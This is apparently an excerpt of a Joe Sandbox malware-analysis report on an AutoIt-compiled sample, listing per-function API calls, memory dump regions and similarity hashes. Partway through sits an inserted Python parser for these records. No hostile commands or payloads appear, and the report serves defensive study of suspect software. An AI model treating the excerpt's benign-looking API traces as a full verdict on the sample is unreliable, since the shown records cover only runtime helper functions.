                                                                                                                                                                                          • Source File: 0000000A.00000002.2228440113.0000000000731000.00000020.00000001.01000000.00000005.sdmp, Offset: 00730000, based on PE: true
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228423540.0000000000730000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228490080.00000000007CD000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228490080.00000000007F3000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228532224.00000000007FD000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228548084.0000000000805000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_10_2_730000_Existence.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: ClassMessageNameSend_wcslen
                                                                                                                                                                                          • String ID: ComboBox$ListBox
                                                                                                                                                                                          • API String ID: 624084870-1403004172
                                                                                                                                                                                          • Opcode ID: a8fcd969dd8bfe1c6cf0bb1d6ee3ed7032c8a8b06253a848ce9fbe12ea70f2fa
                                                                                                                                                                                          • Instruction ID: 258526f53d2be567ecff60bf7d566244f48efc34f99f08b37f37a62b99fafbf0
                                                                                                                                                                                          • Opcode Fuzzy Hash: a8fcd969dd8bfe1c6cf0bb1d6ee3ed7032c8a8b06253a848ce9fbe12ea70f2fa
                                                                                                                                                                                          • Instruction Fuzzy Hash: F801D4B5610228FBDF04FBA4DC59DFE77A8EF46360F100619B932977C2DA39580AC650
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          APIs
                                                                                                                                                                                            • Part of subcall function 0073B329: _wcslen.LIBCMT ref: 0073B333
                                                                                                                                                                                            • Part of subcall function 007945FD: GetClassNameW.USER32(?,?,000000FF), ref: 00794620
                                                                                                                                                                                          • SendMessageW.USER32(?,00000180,00000000,?), ref: 00792593
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 0000000A.00000002.2228440113.0000000000731000.00000020.00000001.01000000.00000005.sdmp, Offset: 00730000, based on PE: true
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228423540.0000000000730000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228490080.00000000007CD000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228490080.00000000007F3000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228532224.00000000007FD000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228548084.0000000000805000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_10_2_730000_Existence.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: ClassMessageNameSend_wcslen
                                                                                                                                                                                          • String ID: ComboBox$ListBox
                                                                                                                                                                                          • API String ID: 624084870-1403004172
                                                                                                                                                                                          • Opcode ID: 4b5b3478b41d799e93a93b05f3b1f0a0ff44632933081db92a503e9e4c948c69
                                                                                                                                                                                          • Instruction ID: 4abdcb2e5a5cedd0ddd21f2a49ef7f6d414eb9da07a47edda71ddc26cfb6d257
                                                                                                                                                                                          • Opcode Fuzzy Hash: 4b5b3478b41d799e93a93b05f3b1f0a0ff44632933081db92a503e9e4c948c69
                                                                                                                                                                                          • Instruction Fuzzy Hash: C901A7B5650108BBDF04F7A0D966EFE77A8DF45340F5000697902A7282DA289E19C6B1
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          APIs
                                                                                                                                                                                            • Part of subcall function 0073B329: _wcslen.LIBCMT ref: 0073B333
                                                                                                                                                                                            • Part of subcall function 007945FD: GetClassNameW.USER32(?,?,000000FF), ref: 00794620
                                                                                                                                                                                          • SendMessageW.USER32(?,00000182,?,00000000), ref: 00792615
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 0000000A.00000002.2228440113.0000000000731000.00000020.00000001.01000000.00000005.sdmp, Offset: 00730000, based on PE: true
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228423540.0000000000730000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228490080.00000000007CD000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228490080.00000000007F3000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228532224.00000000007FD000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228548084.0000000000805000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_10_2_730000_Existence.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: ClassMessageNameSend_wcslen
                                                                                                                                                                                          • String ID: ComboBox$ListBox
                                                                                                                                                                                          • API String ID: 624084870-1403004172
                                                                                                                                                                                          • Opcode ID: a480156164991a20309032cfa36bd7521a7958f54530af76c729d6ba54b4be7d
                                                                                                                                                                                          • Instruction ID: 2505e7ca0a619cc6673097aef1124fb0e2344b0a31a1e255964774bd9f54ed5c
                                                                                                                                                                                          • Opcode Fuzzy Hash: a480156164991a20309032cfa36bd7521a7958f54530af76c729d6ba54b4be7d
                                                                                                                                                                                          • Instruction Fuzzy Hash: 3401A2B5A40108B6DF15F7A0E906EFE77A8DB05340F500029B902E3683DA699E0A96B2
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          APIs
                                                                                                                                                                                            • Part of subcall function 0073B329: _wcslen.LIBCMT ref: 0073B333
                                                                                                                                                                                            • Part of subcall function 007945FD: GetClassNameW.USER32(?,?,000000FF), ref: 00794620
                                                                                                                                                                                          • SendMessageW.USER32(?,0000018B,00000000,00000000), ref: 00792720
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 0000000A.00000002.2228440113.0000000000731000.00000020.00000001.01000000.00000005.sdmp, Offset: 00730000, based on PE: true
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228423540.0000000000730000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228490080.00000000007CD000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228490080.00000000007F3000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228532224.00000000007FD000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228548084.0000000000805000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_10_2_730000_Existence.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: ClassMessageNameSend_wcslen
                                                                                                                                                                                          • String ID: ComboBox$ListBox
                                                                                                                                                                                          • API String ID: 624084870-1403004172
                                                                                                                                                                                          • Opcode ID: 91a8e79a52420ec6c78efb6eb51e9c7446a8780a8e603e234d5bb9be87f82e27
                                                                                                                                                                                          • Instruction ID: b44a2a85755105e95a4bf76bbb8b2f4aed2943b235ff9bab699469c66f0f5417
                                                                                                                                                                                          • Opcode Fuzzy Hash: 91a8e79a52420ec6c78efb6eb51e9c7446a8780a8e603e234d5bb9be87f82e27
                                                                                                                                                                                          • Instruction Fuzzy Hash: 4DF0F4B5B40218B6DF04F3A4DC4AFFE73A8EF01350F400919B622B32C3DB7958098260
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%
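
The function records above share one layout (APIs, Memory Dump Source, IDA Plugin snapshot, Similarity, Uniqueness), and the useful facts are buried in it: which call sites invoke which API, which window message a SendMessageW call carries, and which dumped region is the executable image code versus header or data. The following parser, added here as an example and not part of Joe Sandbox or of its report, pulls those out. It assumes the .sdmp file name is laid out as pid.phase.id.base.protect.x.type.index in hex (an inference from the names above, not documented on this page); the PAGE_* and MEM_IMAGE values are documented winnt.h constants and the LB_* values are documented winuser.h list-box messages. The sample input is constructed from two of the records above.

```python
"""Parse Joe Sandbox per-function records into structured data.

Added example; not Joe Sandbox code.  Assumption: the .sdmp name is laid
out as pid.phase.id.base.protect.x.type.index (hex fields).  PAGE_* and
MEM_IMAGE are documented winnt.h constants; LB_* are documented winuser.h
list-box message numbers.
"""
import re
from dataclasses import dataclass, field
from typing import Optional

PAGE_PROTECT = {
    0x02: "PAGE_READONLY",
    0x04: "PAGE_READWRITE",
    0x10: "PAGE_EXECUTE",
    0x20: "PAGE_EXECUTE_READ",
    0x40: "PAGE_EXECUTE_READWRITE",
}
MEM_IMAGE = 0x1000000

# Only the list-box messages that occur in the records on this page.
LB_MESSAGES = {
    0x180: "LB_ADDSTRING",
    0x182: "LB_DELETESTRING",
    0x18B: "LB_GETCOUNT",
    0x1A2: "LB_FINDSTRINGEXACT",
}

SECTIONS = ("APIs", "Strings", "Memory Dump Source", "Joe Sandbox IDA Plugin",
            "Similarity", "Uniqueness")

API_RE = re.compile(
    r"^(?:Part of subcall function ([0-9A-F]{8}): )?"  # enclosing sub-function, if any
    r"(\w+)\.(\w+)"                                    # API name . module
    r"(?:\((.*)\),)?"                                  # argument list, if shown
    r" ref: ([0-9A-F]{8})$"                            # call-site address
)
# pid . phase . id . base . protect . x . type . index .sdmp  (assumed layout)
SDMP_RE = re.compile(
    r"([0-9A-F]{8})\.([0-9A-F]{8})\.\d+\.([0-9A-F]{16})"
    r"\.([0-9A-F]{8})\.[0-9A-F]{8}\.([0-9A-F]{8})\.[0-9A-F]{8}\.sdmp"
)


@dataclass
class ApiRef:
    api: str
    module: str
    args: list
    ref: int
    subcall_of: Optional[int]   # address of the sub-function, or None for a direct call


@dataclass
class Region:
    pid: int
    phase: int
    base: int
    protect: str
    is_image: bool


@dataclass
class FunctionRecord:
    apis: list = field(default_factory=list)
    regions: list = field(default_factory=list)
    fields: dict = field(default_factory=dict)   # Similarity / snapshot key-value pairs


def parse_records(text: str) -> list:
    """One FunctionRecord per 'Uniqueness Score' line; a trailing partial record is dropped."""
    records, cur, section = [], FunctionRecord(), None
    for raw in text.splitlines():
        line = raw.strip().lstrip("•").strip()
        if not line:
            continue
        if line in SECTIONS:
            section = line
            continue
        if line.startswith("Uniqueness Score:"):
            cur.fields["Uniqueness Score"] = line.split(":", 1)[1].strip()
            records.append(cur)
            cur, section = FunctionRecord(), None
            continue
        if section == "APIs":
            m = API_RE.match(line)
            if m:
                sub, api, mod, args, ref = m.groups()
                cur.apis.append(ApiRef(api, mod, args.split(",") if args else [],
                                       int(ref, 16), int(sub, 16) if sub else None))
        elif section == "Memory Dump Source":
            m = SDMP_RE.search(line)        # tolerates the trailing "Download File" link text
            if m:
                pid, phase, base, prot, typ = m.groups()
                cur.regions.append(Region(int(pid, 16), int(phase, 16), int(base, 16),
                                          PAGE_PROTECT.get(int(prot, 16), prot),
                                          int(typ, 16) == MEM_IMAGE))
        elif section in ("Similarity", "Joe Sandbox IDA Plugin") and ":" in line:
            key, val = line.split(":", 1)
            cur.fields[key.strip()] = val.strip()
    return records


def window_messages(rec: FunctionRecord) -> list:
    """Name the Msg argument of each SendMessageW call in the record; unknown values stay hex."""
    names = []
    for a in rec.apis:
        if a.api == "SendMessageW" and len(a.args) >= 2 and a.args[1] != "?":
            msg = int(a.args[1], 16)
            names.append(LB_MESSAGES.get(msg, f"0x{msg:X}"))
    return names


def executable_regions(rec: FunctionRecord) -> list:
    """Bases of dumped regions whose protection allows execution (the code you would disassemble)."""
    return [r.base for r in rec.regions if "EXECUTE" in r.protect]


# Constructed sample: two of the records listed above, in the report's layout.
SAMPLE = """\
APIs
• Part of subcall function 0073B329: _wcslen.LIBCMT ref: 0073B333
• CharUpperBuffW.USER32(?,?,?), ref: 0079761D
• _wcslen.LIBCMT ref: 00797629
Strings
Memory Dump Source
• Source File: 0000000A.00000002.2228440113.0000000000731000.00000020.00000001.01000000.00000005.sdmp, Offset: 00730000, based on PE: true
• Associated: 0000000A.00000002.2228423540.0000000000730000.00000002.00000001.01000000.00000005.sdmpDownload File
• Associated: 0000000A.00000002.2228532224.00000000007FD000.00000004.00000001.01000000.00000005.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_730000_Existence.jbxd
Similarity
• API ID: _wcslen$BuffCharUpper
• String ID: STOP
• API String ID: 1256254125-2411985666
Uniqueness
Uniqueness Score: -1.00%

APIs
• Part of subcall function 007945FD: GetClassNameW.USER32(?,?,000000FF), ref: 00794620
• SendMessageW.USER32(?,000001A2,000000FF,?), ref: 00792699
Strings
Memory Dump Source
• Source File: 0000000A.00000002.2228440113.0000000000731000.00000020.00000001.01000000.00000005.sdmp, Offset: 00730000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_730000_Existence.jbxd
Similarity
• API ID: ClassMessageNameSend_wcslen
• String ID: ComboBox$ListBox
• API String ID: 624084870-1403004172
Uniqueness
Uniqueness Score: -1.00%
"""

if __name__ == "__main__":
    for rec in parse_records(SAMPLE):
        print(rec.fields.get("API ID"), window_messages(rec),
              [hex(b) for b in executable_regions(rec)])
```

Run against the whole report text, this gives a per-process view of which dumped region holds executable image code (here the PAGE_EXECUTE_READ region at 0x731000 of PID 10) and which records drive list-box or combo-box controls through SendMessageW, which is what you would pivot on when deciding which .sdmp to load into a disassembler.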

Strings
Memory Dump Source
• Source File: 0000000A.00000002.2228440113.0000000000731000.00000020.00000001.01000000.00000005.sdmp, Offset: 00730000, based on PE: true
• Associated: 0000000A.00000002.2228423540.0000000000730000.00000002.00000001.01000000.00000005.sdmp
• Associated: 0000000A.00000002.2228490080.00000000007CD000.00000002.00000001.01000000.00000005.sdmp
• Associated: 0000000A.00000002.2228490080.00000000007F3000.00000002.00000001.01000000.00000005.sdmp
• Associated: 0000000A.00000002.2228532224.00000000007FD000.00000004.00000001.01000000.00000005.sdmp
• Associated: 0000000A.00000002.2228548084.0000000000805000.00000002.00000001.01000000.00000005.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_730000_Existence.jbxd
Similarity
• API ID:
• String ID: 2<v$j3}
• API String ID: 0-393586578
• Opcode ID: bda89111487bd55c930077d1522e98c81c19dc9920facabb93126faf6cf8faa5
• Instruction ID: 4f0711d008c05bd4907d265842a45098b74cd5ff1b71a06fe1cc403411512c25
                                                                                                                                                                                          • Opcode Fuzzy Hash: bda89111487bd55c930077d1522e98c81c19dc9920facabb93126faf6cf8faa5
                                                                                                                                                                                          • Instruction Fuzzy Hash: 01F09029114149AADB149BD1C840AB973B8DF04701F10816ABCCBC7290EA788F91E369
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

APIs
• MessageBoxW.USER32(00000000,Error allocating memory.,AutoIt,00000010), ref: 0079146F
Strings
Memory Dump Source
• Source File: 0000000A.00000002.2228440113.0000000000731000.00000020.00000001.01000000.00000005.sdmp, Offset: 00730000, based on PE: true
• Associated: 0000000A.00000002.2228423540.0000000000730000.00000002.00000001.01000000.00000005.sdmp
• Associated: 0000000A.00000002.2228490080.00000000007CD000.00000002.00000001.01000000.00000005.sdmp
• Associated: 0000000A.00000002.2228490080.00000000007F3000.00000002.00000001.01000000.00000005.sdmp
• Associated: 0000000A.00000002.2228532224.00000000007FD000.00000004.00000001.01000000.00000005.sdmp
• Associated: 0000000A.00000002.2228548084.0000000000805000.00000002.00000001.01000000.00000005.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_730000_Existence.jbxd
Similarity
• API ID: Message
• String ID: AutoIt$Error allocating memory.
• API String ID: 2030045667-4017498283
• Opcode ID: 8f59e97895347da708fa1fa76f97bf1fe397f6724e81388e9c9d40f2a598062a
• Instruction ID: 6247353a41ad2af55de4ada40e57e5cf7e4f2e361192d3eee5070158256aae57
• Opcode Fuzzy Hash: 8f59e97895347da708fa1fa76f97bf1fe397f6724e81388e9c9d40f2a598062a
• Instruction Fuzzy Hash: EBE04871244B1D7AD6342794BC0BFD977848F05B96F11443EFB88655C34EFE685042DA
Uniqueness

Uniqueness Score: -1.00%

APIs
  • Part of subcall function 0074FAD4: InitializeCriticalSectionAndSpinCount.KERNEL32(?,00000000,?,007510E2,?,?,?,0073100A), ref: 0074FAD9
• IsDebuggerPresent.KERNEL32(?,?,?,0073100A), ref: 007510E6
• OutputDebugStringW.KERNEL32(ERROR : Unable to initialize critical section in CAtlBaseModule,?,?,?,0073100A), ref: 007510F5
Strings
• ERROR : Unable to initialize critical section in CAtlBaseModule, xrefs: 007510F0
Memory Dump Source
• Source File: 0000000A.00000002.2228440113.0000000000731000.00000020.00000001.01000000.00000005.sdmp, Offset: 00730000, based on PE: true
• Associated: 0000000A.00000002.2228423540.0000000000730000.00000002.00000001.01000000.00000005.sdmp
• Associated: 0000000A.00000002.2228490080.00000000007CD000.00000002.00000001.01000000.00000005.sdmp
• Associated: 0000000A.00000002.2228490080.00000000007F3000.00000002.00000001.01000000.00000005.sdmp
• Associated: 0000000A.00000002.2228532224.00000000007FD000.00000004.00000001.01000000.00000005.sdmp
• Associated: 0000000A.00000002.2228548084.0000000000805000.00000002.00000001.01000000.00000005.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_730000_Existence.jbxd
Similarity
• API ID: CountCriticalDebugDebuggerInitializeOutputPresentSectionSpinString
• String ID: ERROR : Unable to initialize critical section in CAtlBaseModule
• API String ID: 55579361-631824599
• Opcode ID: a50b31d0566e60867cd4cdf92ca9d3d9306ad3dd589b6f5331d529d34c0a176f
• Instruction ID: bdfc6bebfebd4c327e09e452dc33412954d08cd60f8bd85bdbd21f34b4c93600
• Opcode Fuzzy Hash: a50b31d0566e60867cd4cdf92ca9d3d9306ad3dd589b6f5331d529d34c0a176f
• Instruction Fuzzy Hash: D2E06D706007108BD330AF34D948782BBF4BB00302F00896DE885C2391DBFCE848CB91
Uniqueness

Uniqueness Score: -1.00%

APIs
• GetTempPathW.KERNEL32(00000104,?,00000001), ref: 007A39F0
• GetTempFileNameW.KERNEL32(?,aut,00000000,?), ref: 007A3A05
Strings
Memory Dump Source
• Source File: 0000000A.00000002.2228440113.0000000000731000.00000020.00000001.01000000.00000005.sdmp, Offset: 00730000, based on PE: true
• Associated: 0000000A.00000002.2228423540.0000000000730000.00000002.00000001.01000000.00000005.sdmp
• Associated: 0000000A.00000002.2228490080.00000000007CD000.00000002.00000001.01000000.00000005.sdmp
• Associated: 0000000A.00000002.2228490080.00000000007F3000.00000002.00000001.01000000.00000005.sdmp
• Associated: 0000000A.00000002.2228532224.00000000007FD000.00000004.00000001.01000000.00000005.sdmp
• Associated: 0000000A.00000002.2228548084.0000000000805000.00000002.00000001.01000000.00000005.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_730000_Existence.jbxd
Similarity
• API ID: Temp$FileNamePath
• String ID: aut
• API String ID: 3285503233-3010740371
• Opcode ID: 2165c160234e915af024bb6ed644289dadcdb9d19f15b1845bd9f63ee0eb5f2f
• Instruction ID: 799e3e40907e40a81a422202405385c01e1b05ee25da2b07f375ce342e9c3352
• Opcode Fuzzy Hash: 2165c160234e915af024bb6ed644289dadcdb9d19f15b1845bd9f63ee0eb5f2f
• Instruction Fuzzy Hash: 78D05EB2500328A7DA30A7689C0EFDB7B6CEB44710F0002A5BA5592091DAB8DA85CBD4
Uniqueness

Uniqueness Score: -1.00%

APIs
• FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 007C2E08
• PostMessageW.USER32(00000000), ref: 007C2E0F
  • Part of subcall function 0079F292: Sleep.KERNEL32 ref: 0079F30A
Strings
Memory Dump Source
• Source File: 0000000A.00000002.2228440113.0000000000731000.00000020.00000001.01000000.00000005.sdmp, Offset: 00730000, based on PE: true
• Associated: 0000000A.00000002.2228423540.0000000000730000.00000002.00000001.01000000.00000005.sdmp
• Associated: 0000000A.00000002.2228490080.00000000007CD000.00000002.00000001.01000000.00000005.sdmp
• Associated: 0000000A.00000002.2228490080.00000000007F3000.00000002.00000001.01000000.00000005.sdmp
• Associated: 0000000A.00000002.2228532224.00000000007FD000.00000004.00000001.01000000.00000005.sdmp
• Associated: 0000000A.00000002.2228548084.0000000000805000.00000002.00000001.01000000.00000005.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_730000_Existence.jbxd
Similarity
• API ID: FindMessagePostSleepWindow
• String ID: Shell_TrayWnd
• API String ID: 529655941-2988720461
• Opcode ID: a314854f6649d7daf62cb5e365df6c9cdcc7c9545b7948207ef5523dff2f7b79
• Instruction ID: ec2758c5c18002767cab778f690c185e61893b81fbe4b68ba37d24e1192bfc45
• Opcode Fuzzy Hash: a314854f6649d7daf62cb5e365df6c9cdcc7c9545b7948207ef5523dff2f7b79
• Instruction Fuzzy Hash: C8D0A931381300AAE678B330AC0FFD66B10AB04B00F108838B305EA1C0C8A86800C658
Uniqueness

Uniqueness Score: -1.00%

APIs
• FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 007C2DC8
• PostMessageW.USER32(00000000,00000111,00000197,00000000), ref: 007C2DDB
  • Part of subcall function 0079F292: Sleep.KERNEL32 ref: 0079F30A
Strings
Memory Dump Source
• Source File: 0000000A.00000002.2228440113.0000000000731000.00000020.00000001.01000000.00000005.sdmp, Offset: 00730000, based on PE: true
• Associated: 0000000A.00000002.2228423540.0000000000730000.00000002.00000001.01000000.00000005.sdmp
• Associated: 0000000A.00000002.2228490080.00000000007CD000.00000002.00000001.01000000.00000005.sdmp
• Associated: 0000000A.00000002.2228490080.00000000007F3000.00000002.00000001.01000000.00000005.sdmp
• Associated: 0000000A.00000002.2228532224.00000000007FD000.00000004.00000001.01000000.00000005.sdmp
• Associated: 0000000A.00000002.2228548084.0000000000805000.00000002.00000001.01000000.00000005.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_730000_Existence.jbxd
Similarity
• API ID: FindMessagePostSleepWindow
• String ID: Shell_TrayWnd
• API String ID: 529655941-2988720461
• Opcode ID: 756309002a9303c93e62c9578d5024bec50b5af8db47bb0fe2c3624551073a0e
• Instruction ID: c6c281221ff19bf3a2f429de2b6f1441b88e282d2e4f26631f41a75e84d8155b
• Opcode Fuzzy Hash: 756309002a9303c93e62c9578d5024bec50b5af8db47bb0fe2c3624551073a0e
• Instruction Fuzzy Hash: 41D0C935395314A6E678B770AD0FFE66B54AB54B50F108879B349AA1D0C9A86840C658
Uniqueness

Uniqueness Score: -1.00%

                                                                                                                                                                                          APIs
                                                                                                                                                                                          • MultiByteToWideChar.KERNEL32(?,00000009,?,00000000,00000000,?,?,?,00000000,?,?,?,?,?,00000000,?), ref: 0076C213
                                                                                                                                                                                          • GetLastError.KERNEL32 ref: 0076C221
                                                                                                                                                                                          • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 0076C27C
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 0000000A.00000002.2228440113.0000000000731000.00000020.00000001.01000000.00000005.sdmp, Offset: 00730000, based on PE: true
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228423540.0000000000730000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228490080.00000000007CD000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228490080.00000000007F3000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228532224.00000000007FD000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228548084.0000000000805000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_10_2_730000_Existence.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: ByteCharMultiWide$ErrorLast
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 1717984340-0
                                                                                                                                                                                          • Opcode ID: 762d888f67e1f7dadac72601bd6ca734a89fc741c1d9df10435e013ab27d638f
                                                                                                                                                                                          • Instruction ID: 109ae3b0095ef64b7407b8c93e1dfc34083f5bccd116ebaa72e867746cc4d4d9
                                                                                                                                                                                          • Opcode Fuzzy Hash: 762d888f67e1f7dadac72601bd6ca734a89fc741c1d9df10435e013ab27d638f
                                                                                                                                                                                          • Instruction Fuzzy Hash: 31413831600205EFDF229FE5C854ABA7BA5FF05310F254169FC9BAB1A1DB389C01CB60
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%